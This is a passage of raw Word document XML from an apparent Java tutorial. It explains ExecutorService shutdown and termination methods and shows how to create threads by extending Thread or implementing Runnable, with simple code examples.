        <w:ind w:left="2160"/>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tasks.add(() -&gt; 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33260C9B" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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ExecutorService executor = Executors.newFixedThreadPool(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE7458" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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Integer result = executor.invokeAny(tasks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06822C3D" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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shutdown()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE7D296"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Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method initiates an orderly shutdown in which previously submitted tasks are executed, but no new tasks will be accepted. It does not immediately stop the executing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86A7B3"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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Typically called when you want to terminate the executor and release resources once all tasks are completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADC4462"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3852F2" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>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executor.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED2E49B" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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shutdownNow()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B98EE38"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Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method attempts to stop all actively executing tasks, halts the processing of waiting tasks, and returns a list of the tasks that were waiting to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7A100"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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use this method when you need to shut down the thread pool immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE861DA"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFED4EB" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>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List&lt;Runnable&gt; pendingTasks = executor.shutdownNow();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B045B" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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isShutdown()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922C764"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Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method checks if the thread pool has been shut down (i.e., no new tasks will be accepted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164800E0"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Return Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> boolean: Returns true if the executor has been shut down, false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63565808"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027C0FC4" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>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boolean shutdownStatus = executor.isShutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C75720C" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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isTerminated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A517C4"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Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method checks whether all tasks have completed following a shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088DB038"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Return Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> boolean: Returns true if all tasks have completed after shutdown, false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE0B1E"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED4F46" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>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boolean terminatedStatus = executor.isTerminated();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C06EDF2" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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awaitTermination()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E33B9F"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Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method blocks the calling thread until all tasks have completed execution after a shutdown, or until the specified timeout occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08733362"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Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686EA4D" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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timeout: The maximum time to wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D7728D" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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unit: The time unit of the timeout argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24525840"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Return Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> boolean: Returns true if the tasks completed within the timeout, false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06105E9A" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1184"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D09FB22" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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executor.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F4223D" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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boolean finished = executor.awaitTermination(60, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD264AA" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00000000" w:rsidP="00D50B0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1FADBAF">
          <v:rect id="_x0000_i1849" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C93D0" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Pool Methods Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F8C66" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>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submit(): Submits a task for execution and returns a Future object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3669E5DE" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>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invokeAll(): Submits a collection of tasks and blocks until all of them are completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A45410" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>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invokeAny(): Submits a collection of tasks and returns the result of the first completed task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16399832" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>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shutdown(): Initiates an orderly shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A907A59" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>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shutdownNow(): Attempts an immediate shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B28D69" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>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isShutdown(): Checks if the thread pool is shut down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7D043" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>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isTerminated(): Checks if all tasks have been completed after shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D4905" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>
        </w:numPr>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awaitTermination(): Blocks the calling thread until all tasks are completed or the timeout expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375724E0" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These methods allow you to manage, monitor, and control the execution of tasks in a thread pool efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DA84B" w14:textId="24B2F402" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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lastRenderedPageBreak/>
        <w:pict w14:anchorId="677F9639">
          <v:rect id="_x0000_i1850" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582D5E9" w14:textId="77777777" w:rsidR="003E4B77" w:rsidRPr="00CE4B95" w:rsidRDefault="003E4B77">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="281" w:name="_Toc196307761"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create threads in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="281"/>
    </w:p>
    <w:p w14:paraId="24F73C90" w14:textId="0A9513B0" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In Java, there are two primary ways to create and run threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB1789" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. By Extending the Thread class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F22B796"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The first way to create a thread is by extending the Thread class and overriding its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E9E702" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155018B0" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:num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Create a new class that extends the Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCFCD10" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:num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Override the run() method to define the task that the thread should perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFAB057" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:num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Create an instance of the class and call the start() method to begin executing the run() method in a separate thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4B9EB2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4613E922"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class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E3885C"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F2DE15"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3E88FF"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System.out.println("Thread is running...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A6F6A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2630E1A4" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C4D29E5"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774CFD72"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MyThread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA3F4A6"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thread.start(); // Start the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FED766C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4D936"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6DCD80" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38717C05" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:num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MyThread extends the Thread class and overrides the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFA175" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:num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thread.start() is used to start the execution of the thread, which invokes the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D1F6F3" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. By Implementing the Runnable Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB7C0D"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The second way to create a thread is by implementing the Runnable interface and passing it to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D2EC46" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BEDBF9" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:num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Create a class that implements the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209AF2E" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:num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Implement the run() method to define the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58925BBD" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:num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Create an instance of Thread and pass the Runnable object to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D64E4F" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:num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Call the start() method on the Thread object to begin execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1586EEB7" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748096EE"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B1F00"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05510444"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D6033"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System.out.println("Thread is running using Runnable...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200408B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB9014A" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
